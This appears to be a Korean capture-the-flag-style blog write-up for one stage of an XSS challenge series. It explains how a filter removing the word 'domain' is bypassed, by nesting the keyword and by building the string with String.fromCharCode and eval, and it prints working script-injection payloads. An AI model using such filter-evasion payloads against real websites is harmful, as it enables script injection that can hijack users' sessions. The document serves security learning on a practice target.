저번처럼 hidden속성에 onclick을 활용해 풀었더니 바로 풀렸는데, 원래 의도와는 다른 것 같아 힌트를 보았다.
힌트 : s/domain//g;
처음에 기본 공격구문으로 공격했을때
"><script>alert(document.domain);</script>
위와 같이 domain이 생략되는 것을 알 수 있었다.
다음과 같은 방법으로 우회할 수가 있다.
"><script>alert(document.dodomainmain);</script>
더보기
다른 방법을 첨부한다.
자바스크립트로 우회하는 방법
"><script>alert(eval(String.fromCharCode(100 , 111 , 99 , 117 , 109 , 101 , 110 , 116 , 46 , 100 , 111 , 109 , 97 , 105 , 110 )))</script>
'Web Hacking > XSS challenge' 카테고리의 다른 글
| [XSS challenge] Stage #13 (0) | 2021.05.29 |
|---|---|
| [XSS challenge] Stage #12 (0) | 2021.05.23 |
| [xss challenge] Stage #9 (0) | 2021.05.19 |
| [XSS challenge] Stage #8 (0) | 2021.05.09 |
| [XSS challenge] stage #7 (0) | 2021.05.09 |